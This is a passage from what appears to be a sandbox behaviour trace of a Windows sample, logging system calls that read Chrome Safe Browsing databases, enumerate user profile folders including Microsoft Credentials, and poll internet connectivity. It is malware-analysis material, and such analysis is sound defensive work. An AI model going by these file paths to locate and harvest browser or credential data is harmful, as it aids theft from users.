FileName => FileHandle => 0x000001b8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:42,786 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Safe Browsing Cookies DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:42,796 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x04\x00\x01\x01\x00@ \x00\x00\x00\x07\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00-\xe2\x1e
\x03\xfc\x00\x05\x01@\x00\x03k\x03\xd3\x01\x83\x03<\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:42,826 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 3221225489 | |
| 07:44:42,826 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Safe Browsing Cookies-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:42,836 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:42,856 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 3221225489 | |
| 07:44:42,856 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Safe Browsing Download Whitelist DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:42,896 | 504 | NtReadFile |
Buffer => \xfeq
`\x08\x00\x00\x00,\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00 \x00\x00\x00"\x00\x00\x00$\x00\x00\x00&\x00\x00\x00(\x00\x00\x00*\x00\x00\x00,\x00\x00\x00.\x00\x00\x000\x00\x00\x002\x00\x00\x004\x00\x00\x006\x00\x00\x008\x00\x00\x00:\x00\x00\x00<\x00\x00\x00>\x00\x00\x00@\x00\x00\x00B\x00\x00\x00D\x00\x00\x00F\x00\x00\x00H\x00\x00\x00J\x00\x00\x00L\x00\x00\x00N\x00\x00\x00P\x00\x00\x00R\x00\x00\x00T\x00\x00\x00V\x00\x00\x00X\x00\x00\x00Z\x00\x00\x00\\x00\x00\x00^\x00\x00\x00`\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00
\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00 \x00\x00\x00 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:42,976 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 3221225489 | |
| 07:44:42,976 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Safe Browsing Extension Blacklist DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:43,026 | 504 | NtReadFile |
Buffer => \xfeq
`\x08\x00\x00\x00\xc6\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00
\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00 \x00\x00\x00"\x00\x00\x00$\x00\x00\x00&\x00\x00\x00(\x00\x00\x00*\x00\x00\x00,\x00\x00\x00.\x00\x00\x000\x00\x00\x002\x00\x00\x004\x00\x00\x006\x00\x00\x008\x00\x00\x00:\x00\x00\x00<\x00\x00\x00>\x00\x00\x00@\x00\x00\x00B\x00\x00\x00D\x00\x00\x00F\x00\x00\x00H\x00\x00\x00J\x00\x00\x00L\x00\x00\x00N\x00\x00\x00P\x00\x00\x00R\x00\x00\x00T\x00\x00\x00V\x00\x00\x00X\x00\x00\x00Z\x00\x00\x00\\x00\x00\x00^\x00\x00\x00`\x00\x00\x00b\x00\x00\x00d\x00\x00\x00f\x00\x00\x00h\x00\x00\x00j\x00\x00\x00l\x00\x00\x00n\x00\x00\x00p\x00\x00\x00r\x00\x00\x00t\x00\x00\x00v\x00\x00\x00x\x00\x00\x00 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:43,377 | 504 | NtReadFile |
Buffer => 8\x01\x00\x00kccp\xf8\x00\x00\x00bdcp\xf8\x00\x00\x00bfcp:\x01\x00\x00bgcp\x02\x01\x00\x00dicp\xf8\x00\x00\x00iicp\x18\x01\x00\x00akcp\x8e\x00\x00\x00dlcp(\x01\x00\x00elcpH\x01\x00\x00plcp\x10\x01\x00\x00omcp\x00\x01\x00\x00cocp:\x01\x00\x00kpcp.\x01\x00\x00opcp8\x01\x00\x00dcdp\x0c\x01\x00\x00mcdp
\x01\x00\x00ocdp8\x01\x00\x00hddp\x10\x01\x00\x00fedp\x00\x01\x00\x00dfdp
\x01\x00\x00cgdp
\x01\x00\x00ehdp\xf8\x00\x00\x00bidp:\x01\x00\x00eidp\xf6\x00\x00\x00dndp\xfe\x00\x00\x00jndp\x0c\x01\x00\x00jodp2\x01\x00\x00podp\xfa\x00\x00\x00npdp\xfe\x00\x00\x00kcep\x02\x01\x00\x00idep\xfe\x00\x00\x00ceep FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:43,377 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 3221225489 | |
| 07:44:43,387 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Safe Browsing IP Blacklist DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:43,387 | 504 | NtReadFile |
Buffer => \xfeq
`\x08\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00r \x00\x00t \x00\x00v \x00\x00\x9f\x8bo\xb4\x08\xc4\x96\xc6\xe2o\xb5o\xcbj"D\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00v \x00\x00>Q\xc8\x10t \x00\x00\xb4\xe2\xdfWv \x00\x00\xf5D!\xebr \x00\x00 \x9d\xc6\xfav \x00\x00\xce)\xadS>Q\xc8\x10\xf8\xf1%\xa4\xe2{\xadt\xeb\xf3\x0cP0\xcd\xe4\xe2\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t \x00\x00\xce)\xadS\xb4\xe2\xdfWA\xed\xdd\x92\xbd\xfaFE\x9ba\xac\xa0R\xaeS\x06\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00v \x00\x00\xce)\xadS\xf5D!\xeb
h\x90\x9e4!)[\xa3j\x9d\x95\xed\xb5'\xfb\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00r \x00\x00\xce)\xadS \x9d\xc6\xfa\x11\xfe\xd8\xb3\x1b\xbc<\xc64N\xfe\xbcE\xe2\x86\xad\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001b8 |
SUCCESS | 0x00000000 | |
| 07:44:43,387 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001b8 |
FAILURE | 3221225489 | |
| 07:44:43,387 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,407 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:43,407 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:43,407 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:43,407 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:43,407 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:43,467 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\SwiftShader\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:43,467 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xef\xf5Z\xe0\x91\xcf\x01\x90\x0c\xf1S\xe1\x91\xcf\x01\x90\x0c\xf1S\xe1\x91\xcf\x01\x90\x0c\xf1S\xe1\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00o\x00r\x00a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xc2\x9aR\xe1\x91\xcf\x01pT\x00T\xe1\x91\xcf\x01P\x913S\xe1\x91\xcf\x01pT\x00T\xe1\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x12\x003\x002\x006\x00~\x001\x00.\x004\x005\x001\x00\x00\x00\x00\x00\x00\x003\x00.\x002\x00.\x006\x00.\x004\x005\x001\x005\x009\x00 |
SUCCESS | 0x00000000 | |
| 07:44:43,467 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,547 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\SwiftShader\3.2.6.45159\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:43,547 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xc2\x9aR\xe1\x91\xcf\x01pT\x00T\xe1\x91\xcf\x01P\x913S\xe1\x91\xcf\x01pT\x00T\xe1\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00x\x00\x00\x00\x00\x00\x00\x00\x80L\xd3R\xe1\x91\xcf\x01\x8c\x9c\xeaR\xe1\x91\xcf\x01\x00\xa4\xc0h\xc2&\xcf\x01P8\xeaR\xe1\x91\xcf\x01\x00\xb6\x01\x00\x00\x00\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00l\x00i\x00b\x00E\x00G\x00L\x00.\x00d\x00l\x00l\x00i\x00n\x00g\x00x\x00\x00\x00\x00\x00\x00\x00\xb0F\xedR\xe1\x91\xcf\x01<S)S\xe1\x91\xcf\x01\x00\xa4\xc0h\xc2&\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:43,547 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,547 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,547 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,627 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\WidevineCDM\*.* |
SUCCESS | 0x00169d88 | |
| 07:44:43,627 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf01\x97Z\xe0\x91\xcf\x01\xf01\x97Z\xe0\x91\xcf\x01\xf01\x97Z\xe0\x91\xcf\x01\xf01\x97Z\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:43,627 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,627 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,627 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x00181000 |
SUCCESS | 0x00000000 | |
| 07:44:43,627 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,627 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x00180000 |
SUCCESS | 0x00000000 | |
| 07:44:43,637 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,717 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\CrashReports\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:43,717 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xc0R\xcf"\xe0\x91\xcf\x01\xc0R\xcf"\xe0\x91\xcf\x01\xc0R\xcf"\xe0\x91\xcf\x01\xc0R\xcf"\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:43,717 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,717 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,717 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00001000 BaseAddress => 0x0017f000 |
SUCCESS | 0x00000000 | |
| 07:44:43,717 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,797 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:43,797 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01\xe0\x12\x08\xee\xdf\x91\xcf\x01\xe0\x12\x08\xee\xdf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00x\x00\x00\x00\x00\x00\x00\x00\xc0\xce\xcd\xbf\xd5I\xcd\x01\xc0\xce\xcd\xbf\xd5I\xcd\x01\xc0\xce\xcd\xbf\xd5I\xcd\x01\xc0\xce\xcd\xbf\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x10\x00C\x00D\x00B\x00U\x00R\x00N\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00D\x00 \x00B\x00u\x00r\x00n\x00i\x00n\x00g\x00i\x00n\x00g\x00x\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:43,797 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,878 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\CD Burning\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:43,878 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xc0\xce\xcd\xbf\xd5I\xcd\x01\xc0\xce\xcd\xbf\xd5I\xcd\x01\xc0\xce\xcd\xbf\xd5I\xcd\x01\xc0\xce\xcd\xbf\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:43,878 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:43,878 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:43,958 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Credentials\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:43,958 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00a\xac\xa0R\xaeS\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\\x00\x00\x00\x00\x00\x00\x00\x10\x00S\x00-\x001\x00-\x005\x00-\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00-\x001\x00-\x005\x00-\x002\x001\x00-\x001\x009\x003\x005\x006\x005\x005\x006\x009\x007\x00-\x001\x006\x000\x006\x009\x008\x000\x008\x004\x00 |
SUCCESS | 0x00000000 | |
| 07:44:43,958 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,038 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1935655697-1606980848-1060284298-1003\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:44,038 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\xf0\xaf\x81\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:44,038 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001b4 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,038 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,038 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,118 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Internet Explorer\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:44,118 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0\x12\x08\xee\xdf\x91\xcf\x01\x90\x83/(\xf2\x91\xcf\x01@!\x0b\xee\xdf\x91\xcf\x01@!\x0b\xee\xdf\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00a\xac\xa0R\xaeS\x00\x00\x00\x00\x00\x00\x00\x00@!\x0b\xee\xdf\x91\xcf\x01@!\x0b\xee\xdf\x91\xcf\x01p\xa8\x0c\xee\xdf\x91\xcf\x01p\xa8\x0c\xee\xdf\x91\xcf\x01\x00@\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\x00S\x00I\x00M\x00G\x00S\x00I\x00Z\x00.\x00D\x00A\x00T\x00 |
SUCCESS | 0x00000000 | |
| 07:44:44,118 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,118 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,198 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Microsoft\Media Player\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:44,198 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\xd0\xf6d\xd3\xd4I\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00a\xac\xa0R\xaeS\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01 \xe4\xd2\xd5\xd4I\xcd\x01 \xc4j\xb9\xd5I\xcd\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00 \x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00U\x00R\x00R\x00E\x00N\x00~\x001\x00.\x00W\x00M\x00D\x00C\x00u\x00r\x00r\x00e\x00n\x00t\x00D\x00a\x00t\x00a\x00b\x00a\x00s\x00e\x00_\x005\x009\x00R\x00.\x00w\x00m\x00d\x00b\x00 |
SUCCESS | 0x00000000 | |
| 07:44:44,198 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:44,198 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:44,208 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:44,208 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:44,208 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:44,208 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:44,208 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:44,278 | 504 | FindFirstFileExW |
